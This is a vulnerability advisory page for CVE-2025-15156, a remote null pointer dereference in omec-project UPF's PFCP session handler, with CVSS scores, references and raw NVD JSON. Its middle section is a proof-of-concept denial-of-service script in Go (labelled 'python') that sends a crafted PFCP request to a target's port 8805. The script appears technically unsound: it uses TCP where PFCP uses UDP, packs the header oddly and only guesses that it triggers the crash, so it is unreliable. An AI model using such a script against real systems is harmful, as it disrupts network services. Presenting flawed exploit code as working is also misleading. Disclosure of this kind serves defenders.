CVE-2025-15156

Description

A flaw has been found in omec-project UPF up to 2.1.3-dev. This affects the function handleSessionEstablishmentRequest of the file /pfcpiface/pfcpiface/messages_session.go of the component PFCP Session Establishment Request Handler. This manipulation causes null pointer dereference. The attack may be initiated remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

omec-project UPF < 2.1.3-dev

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

package main

import (
    "bytes"
    "encoding/binary"
    "fmt"
    "net"
    "time"
)

// PFCP IE Types
const (
    IE_CREATE_PDR            = 1
    IE_SESSION_ESTABLISHMENT = 20
)

// PFCP Header
type PFCPHeader struct {
    Version     uint8
    MessageType uint8
    Length      uint32
    SEID        uint64
}

// Create malicious PFCP Session Establishment Request
func createMaliciousPFCPRequest() []byte {
    var buf bytes.Buffer
    
    // PFCP Header
    header := PFCPHeader{
        Version:     1,
        MessageType: IE_SESSION_ESTABLISHMENT,
        Length:      0,
        SEID:        0,
    }
    
    // Write header (simplified)
    buf.WriteByte((header.Version << 5) | header.MessageType)
    buf.WriteByte(0x00) // Flags
    binary.Write(&buf, binary.BigEndian, uint16(header.Length))
    
    // Malicious IE with crafted data to trigger null dereference
    // This IE structure may cause handleSessionEstablishmentRequest
    // to access uninitialized pointers
    buf.WriteByte(0x00) // Type
    buf.WriteByte(0x00) // Length high
    buf.WriteByte(0x01) // Length low
    buf.WriteByte(0x00) // Instance
    buf.WriteByte(0x00) // Malformed data
    
    return buf.Bytes()
}

func exploitCVE202515156(target string, port int) error {
    addr := fmt.Sprintf("%s:%d", target, port)
    conn, err := net.DialTimeout("tcp", addr, 10*time.Second)
    if err != nil {
        return fmt.Errorf("connection failed: %v", err)
    }
    defer conn.Close()
    
    // Send malicious PFCP request
    payload := createMaliciousPFCPRequest()
    _, err = conn.Write(payload)
    if err != nil {
        return fmt.Errorf("send failed: %v", err)
    }
    
    fmt.Printf("[+] Malicious PFCP request sent to %s\n", addr)
    return nil
}

func main() {
    target := "<target-ip>"
    port := 8805 // Default PFCP port
    
    fmt.Println("CVE-2025-15156 PoC - omec-project UPF Null Pointer Dereference")
    err := exploitCVE202515156(target, port)
    if err != nil {
        fmt.Printf("[-] Exploit failed: %v\n", err)
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15156
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15156
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15156/
[4] VulDB https://vuldb.com/cve/CVE-2025-15156
[5] https://github.com/omec-project/upf/issues/979
[6] https://vuldb.com/?ctiid.338534
[7] https://vuldb.com/?id.338534
[8] https://vuldb.com/?submit.719824

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15156", "sourceIdentifier": "[email protected]", "published": "2025-12-28T22:15:43.910", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in omec-project UPF up to 2.1.3-dev. This affects the function handleSessionEstablishmentRequest of the file /pfcpiface/pfcpiface/messages_session.go of the component PFCP Session Establishment Request Handler. This manipulation causes null pointer dereference. The attack may be initiated remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/omec-project/upf/issues/979", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.338534", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.338534", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.719824", "source": "[email protected]"}]}}